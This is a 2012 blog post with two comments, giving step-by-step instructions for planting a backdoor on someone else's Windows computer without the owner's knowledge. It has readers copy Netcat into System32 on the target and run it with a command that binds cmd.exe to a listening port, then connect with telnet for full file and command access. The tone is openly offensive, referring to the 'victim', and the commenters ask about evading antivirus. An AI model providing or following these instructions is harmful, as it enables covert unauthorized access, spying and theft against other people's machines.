Thursday, September 6, 2012

How To Create Backdoor Trojan To Spy On Remote Computer

backdoor trojan spy

What is Backdoor?
A "backdoor" into a computer is a hidden way of accessing the computer without the owner's knowledge.
What can Backdoor do?
Backdoor gives you full access of the target computer from your computer. You can read, delete, copy, or upload any file to victim’s computer.
What Will You Need?
  • Temporary access to target computer
  • IP address of the target computer
 Let’s Start to create backdoor: 
1) Download Netcat for Windows. This program is free and open-source, so you don't have to pay anyone to use it.
2) Unzip the program to any folder you wish.
3) Take the "nc.exe" program and copy it onto the target computer that you want to install a backdoor to. Make sure to put the nc.exe program into the "C:\Windows\System32" directory on the target machine.
4) In target computer, open a command prompt. Type the “cd c:\windows\system32" and press enter it will navigate to the folder where you placed the nc.exe program.
5) Type the following into the command prompt: "nc -d -L -e cmd.exe -p XXXX," where "XXXX" is the port number you wish to connect through. Choose something high, such as port 10000 or higher.
backdoor trojan virus
 6) On your machine, open a command prompt and type the following command: "telnet X.X.X.X XXXX," where "X.X.X.X" is the IP address of the target computer and "XXXX" is the port of the target computer that you opened earlier. This command opens a data link between the two computers, through which you can explore files, run commands and perform other actions.
 7) If you are using windows 7 then telnet is not activated by default so you have to activate it manually. To activate it go to “control panel --> program” and click on “turn windows feature on/off”. Then select both check boxes for telnet server and client.
telnet on or off
 8) That's it. Done ! Now you have full access to target computer.

12 comments:

  1. Can anti virus's pick this up

    ReplyDelete
  2. One of the most populous TROJANS VIRUS & it is very useful for hacker.

    ReplyDelete